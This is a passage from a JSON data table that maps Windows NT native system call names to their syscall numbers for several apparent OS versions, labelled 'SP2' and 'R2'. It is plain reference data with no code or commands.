"NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAcquireCMFViewOwnership": 102, "NtAddBootEntry": 103, "NtAddDriverEntry": 104, "NtAdjustGroupsToken": 105, "NtAlertResumeThread": 106, "NtAlertThread": 107, "NtAllocateLocallyUniqueId": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtRequestDeviceWakeup": 134, "NtCancelIoFileEx": 135, "NtCancelSynchronousIoFile": 136, "NtCommitComplete": 137, "NtCommitEnlistment": 138, "NtCommitTransaction": 139, "NtCompactKeys": 140, "NtCompareTokens": 141, "NtCompleteConnectPort": 142, "NtCompressKey": 143, "NtConnectPort": 144, "NtCreateDebugObject": 145, "NtCreateDirectoryObject": 146, "NtCreateEnlistment": 147, "NtCreateEventPair": 148, "NtCreateIoCompletion": 149, "NtCreateJobObject": 150, "NtCreateJobSet": 151, "NtCreateKeyTransacted": 152, "NtCreateKeyedEvent": 153, "NtCreateMailslotFile": 154, "NtCreateMutant": 155, "NtCreateNamedPipeFile": 156, "NtCreatePagingFile": 157, "NtCreatePort": 158, "NtCreatePrivateNamespace": 159, "NtCreateProcess": 160, "NtCreateProfile": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisplayString": 183, "NtEnumerateBootEntries": 184, "NtEnumerateDriverEntries": 185, "NtEnumerateSystemEnvironmentValuesEx": 186, "NtEnumerateTransactionObject": 187, "NtExtendSection": 188, "NtFilterToken": 189, "NtFlushInstallUILanguage": 190, "NtFlushInstructionCache": 191, "NtFlushKey": 192, "NtFlushProcessWriteBuffers": 193, "NtFlushVirtualMemory": 194, "NtFlushWriteBuffer": 195, "NtFreeUserPhysicalPages": 196, "NtFreezeRegistry": 197, "NtFreezeTransactions": 198, "NtGetContextThread": 199, "NtGetCurrentProcessorNumber": 200, "NtGetDevicePowerState": 201, "NtGetMUIRegistryInfo": 202, "NtGetNextProcess": 203, "NtGetNextThread": 204, "NtGetNlsSectionPtr": 205, "NtGetNotificationResourceManager": 206, "NtGetPlugPlayEvent": 207, "NtGetWriteWatch": 208, "NtImpersonateAnonymousToken": 209, "NtImpersonateThread": 210, "NtInitializeNlsFiles": 211, "NtInitializeRegistry": 212, "NtInitiatePowerAction": 213, "NtIsSystemResumeAutomatic": 214, "NtIsUILanguageComitted": 215, "NtListenPort": 216, "NtLoadDriver": 217, "NtLoadKey": 218, "NtLoadKey2": 219, "NtLoadKeyEx": 220, "NtLockFile": 221, "NtLockProductActivationKeys": 222, "NtLockRegistryKey": 223, "NtLockVirtualMemory": 224, "NtMakePermanentObject": 225, "NtMakeTemporaryObject": 226, "NtMapCMFModule": 227, "NtMapUserPhysicalPages": 228, "NtModifyBootEntry": 229, "NtModifyDriverEntry": 230, "NtNotifyChangeDirectoryFile": 231, "NtNotifyChangeKey": 232, "NtNotifyChangeMultipleKeys": 233, "NtOpenEnlistment": 234, "NtOpenEventPair": 235, "NtOpenIoCompletion": 236, "NtOpenJobObject": 237, "NtOpenKeyTransacted": 238, "NtOpenKeyedEvent": 239, "NtOpenMutant": 240, "NtOpenObjectAuditAlarm": 241, "NtOpenPrivateNamespace": 242, "NtOpenProcessToken": 243, "NtOpenResourceManager": 244, "NtOpenSemaphore": 245, "NtOpenSession": 246, "NtOpenSymbolicLinkObject": 247, "NtOpenThread": 248, "NtOpenTimer": 249, "NtOpenTransaction": 250, "NtOpenTransactionManager": 251, "NtPlugPlayControl": 252, "NtPrePrepareComplete": 253, "NtPrePrepareEnlistment": 254, "NtPrepareComplete": 255, "NtPrepareEnlistment": 256, "NtPrivilegeCheck": 257, "NtPrivilegeObjectAuditAlarm": 258, "NtPrivilegedServiceAuditAlarm": 259, "NtPropagationComplete": 260, "NtPropagationFailed": 261, "NtPulseEvent": 262, "NtQueryBootEntryOrder": 263, "NtQueryBootOptions": 264, "NtQueryDebugFilterState": 265, "NtQueryDirectoryObject": 266, "NtQueryDriverEntryOrder": 267, "NtQueryEaFile": 268, "NtQueryFullAttributesFile": 269, "NtQueryInformationAtom": 270, "NtQueryInformationEnlistment": 271, "NtQueryInformationJobObject": 272, "NtQueryInformationPort": 273, "NtQueryInformationResourceManager": 274, "NtQueryInformationTransaction": 275, "NtQueryInformationTransactionManager": 276, "NtQueryInformationWorkerFactory": 277, "NtQueryInstallUILanguage": 278, "NtQueryIntervalProfile": 279, "NtQueryIoCompletion": 280, "NtQueryLicenseValue": 281, "NtQueryMultipleValueKey": 282, "NtQueryMutant": 283, "NtQueryOpenSubKeys": 284, "NtQueryOpenSubKeysEx": 285, "NtQueryPortInformationProcess": 286, "NtQueryQuotaInformationFile": 287, "NtQuerySecurityObject": 288, "NtQuerySemaphore": 289, "NtQuerySymbolicLinkObject": 290, "NtQuerySystemEnvironmentValue": 291, "NtQuerySystemEnvironmentValueEx": 292, "NtQueryTimerResolution": 293, "NtRaiseException": 294, "NtRaiseHardError": 295, "NtReadOnlyEnlistment": 296, "NtRecoverEnlistment": 297, "NtRecoverResourceManager": 298, "NtRecoverTransactionManager": 299, "NtRegisterProtocolAddressInformation": 300, "NtRegisterThreadTerminatePort": 301, "NtReleaseCMFViewOwnership": 302, "NtReleaseKeyedEvent": 303, "NtReleaseWorkerFactoryWorker": 304, "NtRemoveIoCompletionEx": 305, "NtRemoveProcessDebug": 306, "NtRenameKey": 307, "NtRenameTransactionManager": 308, "NtReplaceKey": 309, "NtReplacePartitionUnit": 310, "NtReplyWaitReplyPort": 311, "NtCancelDeviceWakeupRequest": 312, "NtRequestPort": 313, "NtRequestWakeupLatency": 314, "NtResetEvent": 315, "NtResetWriteWatch": 316, "NtRestoreKey": 317, "NtResumeProcess": 318, "NtRollbackComplete": 319, "NtRollbackEnlistment": 320, "NtRollbackTransaction": 321, "NtRollforwardTransactionManager": 322, "NtSaveKey": 323, "NtSaveKeyEx": 324, "NtSaveMergedKeys": 325, "NtSecureConnectPort": 326, "NtSetBootEntryOrder": 327, "NtSetBootOptions": 328, "NtSetContextThread": 329, "NtSetDebugFilterState": 330, "NtSetDefaultHardErrorPort": 331, "NtSetDefaultLocale": 332, "NtSetDefaultUILanguage": 333, "NtSetDriverEntryOrder": 334, "NtSetEaFile": 335, "NtSetHighEventPair": 336, "NtSetHighWaitLowEventPair": 337, "NtSetInformationDebugObject": 338, "NtSetInformationEnlistment": 339, "NtSetInformationJobObject": 340, "NtSetInformationKey": 341, "NtSetInformationResourceManager": 342, "NtSetInformationToken": 343, "NtSetInformationTransaction": 344, "NtSetInformationTransactionManager": 345, "NtSetInformationWorkerFactory": 346, "NtSetIntervalProfile": 347, "NtSetIoCompletion": 348, "NtSetLdtEntries": 349, "NtSetLowEventPair": 350, "NtSetLowWaitHighEventPair": 351, "NtSetQuotaInformationFile": 352, "NtSetSecurityObject": 353, "NtSetSystemEnvironmentValue": 354, "NtSetSystemEnvironmentValueEx": 355, "NtSetSystemInformation": 356, "NtSetSystemPowerState": 357, "NtSetSystemTime": 358, "NtSetThreadExecutionState": 359, "NtSetTimerResolution": 360, "NtSetUuidSeed": 361, "NtSetVolumeInformationFile": 362, "NtShutdownSystem": 363, "NtShutdownWorkerFactory": 364, "NtSignalAndWaitForSingleObject": 365, "NtSinglePhaseReject": 366, "NtStartProfile": 367, "NtStopProfile": 368, "NtSuspendProcess": 369, "NtSuspendThread": 370, "NtSystemDebugControl": 371, "NtTerminateJobObject": 372, "NtTestAlert": 373, "NtThawRegistry": 374, "NtThawTransactions": 375, "NtTraceControl": 376, "NtTranslateFilePath": 377, "NtUnloadDriver": 378, "NtUnloadKey": 379, "NtUnloadKey2": 380, "NtUnloadKeyEx": 381, "NtUnlockFile": 382, "NtUnlockVirtualMemory": 383, "NtVdmControl": 384, "NtWaitForDebugEvent": 385, "NtWaitForKeyedEvent": 386, "NtWaitForWorkViaWorkerFactory": 387, "NtWaitHighEventPair": 388, "NtWaitLowEventPair": 389, "NtWorkerFactoryWorkerReady": 390}, "SP2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAcquireCMFViewOwnership": 102, "NtAddBootEntry": 103, "NtAddDriverEntry": 104, "NtAdjustGroupsToken": 105, "NtAlertResumeThread": 106, "NtAlertThread": 107, "NtAllocateLocallyUniqueId": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelDeviceWakeupRequest": 134, "NtCancelIoFileEx": 135, "NtCancelSynchronousIoFile": 136, "NtCommitComplete": 137, "NtCommitEnlistment": 138, "NtCommitTransaction": 139, "NtCompactKeys": 140, "NtCompareTokens": 141, "NtCompleteConnectPort": 142, "NtCompressKey": 143, "NtConnectPort": 144, "NtCreateDebugObject": 145, "NtCreateDirectoryObject": 146, "NtCreateEnlistment": 147, "NtCreateEventPair": 148, "NtCreateIoCompletion": 149, "NtCreateJobObject": 150, "NtCreateJobSet": 151, "NtCreateKeyTransacted": 152, "NtCreateKeyedEvent": 153, "NtCreateMailslotFile": 154, "NtCreateMutant": 155, "NtCreateNamedPipeFile": 156, "NtCreatePagingFile": 157, "NtCreatePort": 158, "NtCreatePrivateNamespace": 159, "NtCreateProcess": 160, "NtCreateProfile": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisplayString": 183, "NtEnumerateBootEntries": 184, "NtEnumerateDriverEntries": 185, "NtEnumerateSystemEnvironmentValuesEx": 186, "NtEnumerateTransactionObject": 187, "NtExtendSection": 188, "NtFilterToken": 189, "NtFlushInstallUILanguage": 190, "NtFlushInstructionCache": 191, "NtFlushKey": 192, "NtFlushProcessWriteBuffers": 193, "NtFlushVirtualMemory": 194, "NtFlushWriteBuffer": 195, "NtFreeUserPhysicalPages": 196, "NtFreezeRegistry": 197, "NtFreezeTransactions": 198, "NtGetContextThread": 199, "NtGetCurrentProcessorNumber": 200, "NtGetDevicePowerState": 201, "NtGetMUIRegistryInfo": 202, "NtGetNextProcess": 203, "NtGetNextThread": 204, "NtGetNlsSectionPtr": 205, "NtGetNotificationResourceManager": 206, "NtGetPlugPlayEvent": 207, "NtGetWriteWatch": 208, "NtImpersonateAnonymousToken": 209, "NtImpersonateThread": 210, "NtInitializeNlsFiles": 211, "NtInitializeRegistry": 212, "NtInitiatePowerAction": 213, "NtIsSystemResumeAutomatic": 214, "NtIsUILanguageComitted": 215, "NtListenPort": 216, "NtLoadDriver": 217, "NtLoadKey": 218, "NtLoadKey2": 219, "NtLoadKeyEx": 220, "NtLockFile": 221, "NtLockProductActivationKeys": 222, "NtLockRegistryKey": 223, "NtLockVirtualMemory": 224, "NtMakePermanentObject": 225, "NtMakeTemporaryObject": 226, "NtMapCMFModule": 227, "NtMapUserPhysicalPages": 228, "NtModifyBootEntry": 229, "NtModifyDriverEntry": 230, "NtNotifyChangeDirectoryFile": 231, "NtNotifyChangeKey": 232, "NtNotifyChangeMultipleKeys": 233, "NtOpenEnlistment": 234, "NtOpenEventPair": 235, "NtOpenIoCompletion": 236, "NtOpenJobObject": 237, "NtOpenKeyTransacted": 238, "NtOpenKeyedEvent": 239, "NtOpenMutant": 240, "NtOpenObjectAuditAlarm": 241, "NtOpenPrivateNamespace": 242, "NtOpenProcessToken": 243, "NtOpenResourceManager": 244, "NtOpenSemaphore": 245, "NtOpenSession": 246, "NtOpenSymbolicLinkObject": 247, "NtOpenThread": 248, "NtOpenTimer": 249, "NtOpenTransaction": 250, "NtOpenTransactionManager": 251, "NtPlugPlayControl": 252, "NtPrePrepareComplete": 253, "NtPrePrepareEnlistment": 254, "NtPrepareComplete": 255, "NtPrepareEnlistment": 256, "NtPrivilegeCheck": 257, "NtPrivilegeObjectAuditAlarm": 258, "NtPrivilegedServiceAuditAlarm": 259, "NtPropagationComplete": 260, "NtPropagationFailed": 261, "NtPulseEvent": 262, "NtQueryBootEntryOrder": 263, "NtQueryBootOptions": 264, "NtQueryDebugFilterState": 265, "NtQueryDirectoryObject": 266, "NtQueryDriverEntryOrder": 267, "NtQueryEaFile": 268, "NtQueryFullAttributesFile": 269, "NtQueryInformationAtom": 270, "NtQueryInformationEnlistment": 271, "NtQueryInformationJobObject": 272, "NtQueryInformationPort": 273, "NtQueryInformationResourceManager": 274, "NtQueryInformationTransaction": 275, "NtQueryInformationTransactionManager": 276, "NtQueryInformationWorkerFactory": 277, "NtQueryInstallUILanguage": 278, "NtQueryIntervalProfile": 279, "NtQueryIoCompletion": 280, "NtQueryLicenseValue": 281, "NtQueryMultipleValueKey": 282, "NtQueryMutant": 283, "NtQueryOpenSubKeys": 284, "NtQueryOpenSubKeysEx": 285, "NtQueryPortInformationProcess": 286, "NtQueryQuotaInformationFile": 287, "NtQuerySecurityObject": 288, "NtQuerySemaphore": 289, "NtQuerySymbolicLinkObject": 290, "NtQuerySystemEnvironmentValue": 291, "NtQuerySystemEnvironmentValueEx": 292, "NtQueryTimerResolution": 293, "NtRaiseException": 294, "NtRaiseHardError": 295, "NtReadOnlyEnlistment": 296, "NtRecoverEnlistment": 297, "NtRecoverResourceManager": 298, "NtRecoverTransactionManager": 299, "NtRegisterProtocolAddressInformation": 300, "NtRegisterThreadTerminatePort": 301, "NtReleaseCMFViewOwnership": 302, "NtReleaseKeyedEvent": 303, "NtReleaseWorkerFactoryWorker": 304, "NtRemoveIoCompletionEx": 305, "NtRemoveProcessDebug": 306, "NtRenameKey": 307, "NtRenameTransactionManager": 308, "NtReplaceKey": 309, "NtReplacePartitionUnit": 310, "NtReplyWaitReplyPort": 311, "NtRequestDeviceWakeup": 312, "NtRequestPort": 313, "NtRequestWakeupLatency": 314, "NtResetEvent": 315, "NtResetWriteWatch": 316, "NtRestoreKey": 317, "NtResumeProcess": 318, "NtRollbackComplete": 319, "NtRollbackEnlistment": 320, "NtRollbackTransaction": 321, "NtRollforwardTransactionManager": 322, "NtSaveKey": 323, "NtSaveKeyEx": 324, "NtSaveMergedKeys": 325, "NtSecureConnectPort": 326, "NtSetBootEntryOrder": 327, "NtSetBootOptions": 328, "NtSetContextThread": 329, "NtSetDebugFilterState": 330, "NtSetDefaultHardErrorPort": 331, "NtSetDefaultLocale": 332, "NtSetDefaultUILanguage": 333, "NtSetDriverEntryOrder": 334, "NtSetEaFile": 335, "NtSetHighEventPair": 336, "NtSetHighWaitLowEventPair": 337, "NtSetInformationDebugObject": 338, "NtSetInformationEnlistment": 339, "NtSetInformationJobObject": 340, "NtSetInformationKey": 341, "NtSetInformationResourceManager": 342, "NtSetInformationToken": 343, "NtSetInformationTransaction": 344, "NtSetInformationTransactionManager": 345, "NtSetInformationWorkerFactory": 346, "NtSetIntervalProfile": 347, "NtSetIoCompletion": 348, "NtSetLdtEntries": 349, "NtSetLowEventPair": 350, "NtSetLowWaitHighEventPair": 351, "NtSetQuotaInformationFile": 352, "NtSetSecurityObject": 353, "NtSetSystemEnvironmentValue": 354, "NtSetSystemEnvironmentValueEx": 355, "NtSetSystemInformation": 356, "NtSetSystemPowerState": 357, "NtSetSystemTime": 358, "NtSetThreadExecutionState": 359, "NtSetTimerResolution": 360, "NtSetUuidSeed": 361, "NtSetVolumeInformationFile": 362, "NtShutdownSystem": 363, "NtShutdownWorkerFactory": 364, "NtSignalAndWaitForSingleObject": 365, "NtSinglePhaseReject": 366, "NtStartProfile": 367, "NtStopProfile": 368, "NtSuspendProcess": 369, "NtSuspendThread": 370, "NtSystemDebugControl": 371, "NtTerminateJobObject": 372, "NtTestAlert": 373, "NtThawRegistry": 374, "NtThawTransactions": 375, "NtTraceControl": 376, "NtTranslateFilePath": 377, "NtUnloadDriver": 378, "NtUnloadKey": 379, "NtUnloadKey2": 380, "NtUnloadKeyEx": 381, "NtUnlockFile": 382, "NtUnlockVirtualMemory": 383, "NtVdmControl": 384, "NtWaitForDebugEvent": 385, "NtWaitForKeyedEvent": 386, "NtWaitForWorkViaWorkerFactory": 387, "NtWaitHighEventPair": 388, "NtWaitLowEventPair": 389, "NtWorkerFactoryWorkerReady": 390}, "R2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateReserveObject": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelIoFileEx": 134, "NtCancelSynchronousIoFile": 135, "NtCommitComplete": 136, "NtCommitEnlistment": 137, "NtCommitTransaction": 138, "NtCompactKeys": 139, "NtCompareTokens": 140, "NtCompleteConnectPort": 141, "NtCompressKey": 142, "NtConnectPort": 143, "NtCreateDebugObject": 144, "NtCreateDirectoryObject": 145, "NtCreateEnlistment": 146, "NtCreateEventPair": 147, "NtCreateIoCompletion": 148, "NtCreateJobObject": 149, "NtCreateJobSet": 150, "NtCreateKeyTransacted": 151, "NtCreateKeyedEvent": 152, "NtCreateMailslotFile": 153, "NtCreateMutant": 154, "NtCreateNamedPipeFile": 155, "NtCreatePagingFile": 156, "NtCreatePort": 157, "NtCreatePrivateNamespace": 158, "NtCreateProcess": 159, "NtCreateProfile": 160, "NtCreateProfileEx": 161, "NtCreateResourceManager": 162, "NtCreateSemaphore": 163, "NtCreateSymbolicLinkObject": 164, "NtCreateThreadEx": 165, "NtCreateTimer": 166, "NtCreateToken": 167, "NtCreateTransaction": 168, "NtCreateTransactionManager": 169, "NtCreateUserProcess": 170, "NtCreateWaitablePort": 171, "NtCreateWorkerFactory": 172, "NtDebugActiveProcess": 173, "NtDebugContinue": 174, "NtDeleteAtom": 175, "NtDeleteBootEntry": 176, "NtDeleteDriverEntry": 177, "NtDeleteFile": 178, "NtDeleteKey": 179, "NtDeleteObjectAuditAlarm": 180, "NtDeletePrivateNamespace": 181, "NtDeleteValueKey": 182, "NtDisableLastKnownGood": 183, "NtDisplayString": 